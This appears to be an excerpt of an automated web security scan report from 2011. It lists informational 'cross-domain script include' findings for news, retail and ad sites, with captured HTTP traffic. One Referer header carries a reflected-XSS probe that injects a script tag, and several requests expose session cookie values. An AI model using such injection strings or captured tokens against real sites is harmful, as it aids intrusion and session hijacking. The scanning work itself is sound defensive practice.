Expires: Sun, 04 Sep 2011 00:59:33 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 25358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<base target="_top" />

<link href="http://s6.scribdassets.com/aggregated/css/base.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/web.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/fragments.css?1314908997" media="screen" rel="stylesheet" type="text/css" />


...[SNIP]...
</style>
<script type='text/javascript' src='http://fonts4.scribdassets.com/static/4gen.js?1314662118'> </script>
...[SNIP]...
</script>
<link rel='stylesheet' type='text/css' href='http://fonts1.scribdassets.com/static/4gen.css?1314662118'/>

<link rel='stylesheet' type='text/css' href='http://fonts1.scribdassets.com/static/4gen_non_ie.css?1314662118' />

...[SNIP]...


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-13DPpb-yg8ofc" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-13DPpb-yg8ofc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=9304646&cv=2.0&cj=1" />
</noscript>
...[SNIP]...

19. Cross-domain script include previous next
There are 48 instances of this issue:

http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://blogs.sacbee.com/the_state_worker/
http://cdn.optmd.com/V2/89733/235451/index.html
http://community.sprint.com/baw/index.jspa
http://content.usatoday.com/communities/campusrivalry/topics
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://grfx.cstv.com/scripts/oas-omni-controls.js
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://www.facebook.com/plugins/likebox.php
http://www.personalcreations.com/
http://www.personalcreations.com/CatalogQuickOrder.aspx
http://www.personalcreations.com/CustomerService-ContactUs.aspx
http://www.personalcreations.com/apparel-gifts-her-PHERAPP
http://www.personalcreations.com/default.aspx
http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY
http://www.personalcreations.com/halloween-home-decorations-PHALHOM
http://www.personalcreations.com/just-because-gifts-PJBEBSL
http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL
http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S
http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL
http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR
http://www.personalcreations.com/personalized-business-gifts-PBIZGFT
http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL
http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN
http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA
http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA
http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP
http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW
http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG
http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW
http://www.personalcreations.com/personalized-pet-gifts-PPETBSL
http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL
http://www.personalcreations.com/radioDefault.aspx
http://www.personalcreations.com/sitemap.aspx
http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
http://www.reuters.com/assets/commentsChild
http://www.reuters.com/assets/newsFlash
http://www.sacbee.com/notfound/
http://www.scribd.com/embeds/63688924/content
http://www.scribd.com/embeds/63688924/content_inner
http://www.sprint.com/index_c.html
https://www.sprint.net/performance/
http://www.und.com/sports/m-footbl/9873956
http://www.und.com/sports/m-footbl/9874134
http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html
http://www.youtube.com/embed/xXftjfC3b5o

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

19.1. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;

Request

Response

19.2. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;

Request

Response

19.3. http://blogs.sacbee.com/the_state_worker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.sacbee.com
Path:	/the_state_worker/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js
http://init.lingospot.com/ls.js?key=3_Sacbee
http://init.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=300
http://init.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300

Request

GET /the_state_worker/ HTTP/1.1
Host: blogs.sacbee.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sacbee_user_auth=.threshold%7c.threshold%7cacv-5_2%7cx%7c1%7cMDVqbGpwenh0em5wfHYwMGptOW5sbGxudGwgcXJtdHB2dCAwdjlqMHZ2cnRrb3F6bGs5cjlqdDlua25wbnRybXFyMHF6dG0wdG54MHA%3d; s_cc=true; s_vnum=1317445200364%26vn%3D1; s_ppv=100; mi_ppu=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html; s_invisit=true; mi_ppn=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal; mi_pph=3000; mi_pvh=1000; mi_ppl=*Story; s_sq=nmsacramento%3D%2526pid%253DStory%25253A%2525203883102%25257CSprint%252520could%252520be%252520winner%252520in%252520thwarted%252520T-Mobile-AT%252526T%252520deal%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.sacbee.com/the_state_worker/%252523navlink%25253Dnavdrop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:07 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div>
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=300"></script>
...[SNIP]...
<div>
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

19.4. http://cdn.optmd.com/V2/89733/235451/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/V2/89733/235451/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/

Request

Response

19.5. http://community.sprint.com/baw/index.jspa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/index.jspa

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /baw/index.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:43 GMT
Server: Apache-Coyote/1.1
X-JAL: 314
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=445807 t=1315099123758151
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 169328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=sprintshare" type="text/javascript"></script>
...[SNIP]...

19.6. http://content.usatoday.com/communities/campusrivalry/topics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/communities/campusrivalry/topics

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Content-Length: 40492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:og=
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19.7. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

19.8. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js

Request

Response

19.9. http://grfx.cstv.com/scripts/oas-omni-controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/scripts/oas-omni-controls.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-sports.js
http://ocp.ncaa.com/adFunctions.js?site=188

Request

GET /scripts/oas-omni-controls.js HTTP/1.1
Host: grfx.cstv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.und.com/sportsb3f73%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E312ccc6a7af/m-footbl/9873956

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3912956150"
Last-Modified: Wed, 26 Jan 2011 17:07:09 GMT
Content-Length: 10053
Server: lighttpd
Date: Sun, 04 Sep 2011 00:56:14 GMT
Connection: close

/*
created by david parnell
copyright College Sports Online, Inc.
no part of this application may be used, duplicated or accessed without permission
*/
var NS4 = (document.layers) ? true : false;
var
...[SNIP]...
</script>');
// now calls http://grfx.cstv.com/scripts/mantaray.js from ncaa/library/scripts/cookieCheck.js for Madison for NCAA
//document.writeln('<script language="javascript" src="http://ocp.ncaa.com/adFunctions.js?site=188"></script>');
//document.writeln('<script language="javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-sports.js"></script>
...[SNIP]...

19.10. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://imp.fetchback.com/serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-2.3214995.3237976?url=

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

19.11. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

Response

19.12. http://www.personalcreations.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

Response

19.13. http://www.personalcreations.com/CatalogQuickOrder.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/CatalogQuickOrder.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /CatalogQuickOrder.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:37 GMT
Connection: close
Content-Length: 103473

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

19.14. http://www.personalcreations.com/CustomerService-ContactUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/CustomerService-ContactUs.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /CustomerService-ContactUs.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 98295

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
